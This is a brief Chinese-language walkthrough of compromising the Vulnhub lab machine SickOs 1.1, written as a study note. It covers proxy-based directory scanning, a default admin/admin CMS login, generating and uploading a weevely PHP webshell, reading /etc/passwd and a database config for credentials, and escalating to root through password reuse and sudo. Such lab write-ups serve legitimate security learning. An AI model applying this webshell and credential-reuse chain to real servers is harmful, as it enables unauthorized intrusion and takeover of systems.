Vulnhub系列-sick0s1.1
靶机:192.168.12.130
kali: 192.168.249.128
一、信息收集
nmap -sV 192.168.12.130 –扫描开放端口
3128端口是作为代理

dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录
扫到robots.txt
Wolf CMS
后台管理:?/admin
一试就出来了–弱口令:admin/admin
weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。(又学到一个工具)
weevely generate 666 yasso.php –密码666
–上传–
weevely连接木马(需要开启代理)
export http_proxy=http://192.168.12.130:3128 –配置代理


打完靶机切记删除代理!!!
unset http_proxy –删除代理
weevely http://192.168.12.130/wolfcms/public/yasso.php 666 –连接木马

二、提权
cd /var/www/wolfcms–/var/www/wolfcms目录下面发现数据库配置文件

发现用户名/密码=root/john@123

貌似只允许本地连接

cat /etc/passwd | grep /bin/bash –查看当前用户

发现sickos用户
root数据库密码即sickos密码
ssh sickos@192.168.12.130 ssh连接
sudo su –输入sickos密码

成功root